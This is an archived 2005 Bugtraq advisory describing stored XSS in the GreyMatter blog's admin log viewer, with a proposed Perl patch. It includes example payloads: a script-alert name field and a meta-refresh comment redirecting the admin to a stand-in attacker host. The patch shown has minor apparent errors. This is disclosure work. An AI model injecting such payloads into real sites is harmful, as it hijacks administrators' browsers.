[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: XSS in GreyMatter blog
From: poizon () securityinfo ! ru
Date: 2005-08-31 8:58:35
Message-ID: 60050.213.140.231.61.1125478715.squirrel () 213 ! 140 ! 231 ! 61
[Download RAW message or body]
Graymatter - perl based web blog.
offsite: http://www.greymatterforums.com/
GM analyze posting comments and if post contain some dangerous code (like
<script></script>), administrator get message about it in log files. Log
files contain not only message, but dangerous code.
When admin try to look log files (Admin panel Options: "View Control Panel
Log"), code execute in admin's browser.
Example attack:
Add comments:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>
And admin can't enter in "View Control Panel Log" menu, because this page
is redirecting on attacker site.
Solution:
Edit gm-library.cgi. Like that:
-----------------------------------------------------------
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);
foreach $gmlogfileline (@gmlogfile) {
chomp ($gmlogfileline);
$gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
$gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
$gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
$gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
$gmlogfileline=~s/<|>|<|>/#/ig;
$gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
$gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/iig;
$gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
$gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sory for my english, it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic